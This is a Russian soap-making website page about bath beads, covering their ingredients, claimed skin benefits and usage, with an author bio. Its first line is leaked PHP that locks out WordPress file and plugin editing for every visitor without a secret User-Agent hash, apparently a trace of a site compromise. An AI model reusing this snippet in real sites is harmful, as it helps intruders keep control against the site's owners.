if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Бисер для ванны | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Бисер для ванны

Жемчужины для ванн изготавливаются на основе натуральных эфирных масел и экстрактов лекарственных растений

Домашняя косметика - Бисер для ванны Домашняя косметика - Бисер для ванны

Жем­чу­жи­ны для ванн изго­тав­ли­ва­ют­ся на осно­ве нату­раль­ных эфир­ных масел и экс­трак­тов лекар­ствен­ных растений.

Если точ­нее, то в состав бисе­ра вхо­дит: кар­ба­мид, базо­вое мас­ло (напри­мер, мас­ло вино­град­ных косто­чек), экс­тракт рас­те­ний, пар­фю­мер­ная ком­по­зи­ция, эфир­ные мас­ла и микка.

Рас­тво­ря­ясь в воде, мас­ла про­ни­ка­ют в кожу и при­но­сят поль­зу. В про­дук­тах этой серии нет ниче­го лиш­не­го, т.к. они сде­ла­ны пол­но­стью на нату­раль­ной осно­ве, без искус­ствен­ных добавок.

Базис­ная осно­ва соле­вых жем­чуж­ных гра­нул уре­гу­ли­ру­ет щелоч­ной баланс город­ской воды, уси­лит тони­зи­ру­ю­щий эффект, нату­раль­ные мине­раль­ные соли повы­ша­ют плот­ность и упру­гость кожи и бла­го­твор­но вли­я­ют на мик­ро­цир­ку­ля­цию крови.

При­ме­не­ние

Про­сто добавь­те несколь­ко жем­чу­жин в воду перед при­ня­ти­ем ван­ны и насла­ди­тесь чудес­ны­ми аро­ма­та­ми и ощу­ще­ни­ем забо­ты о Вашей коже. Дли­тель­ность про­це­ду­ры — не менее 10 минут. После при­ня­тия ван­ны высу­ши­те тело мах­ро­вым полотенцем.

Бисер так­же исполь­зу­ет­ся как деко­ра­тив­ный эле­мент для мыла и бомбочек


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!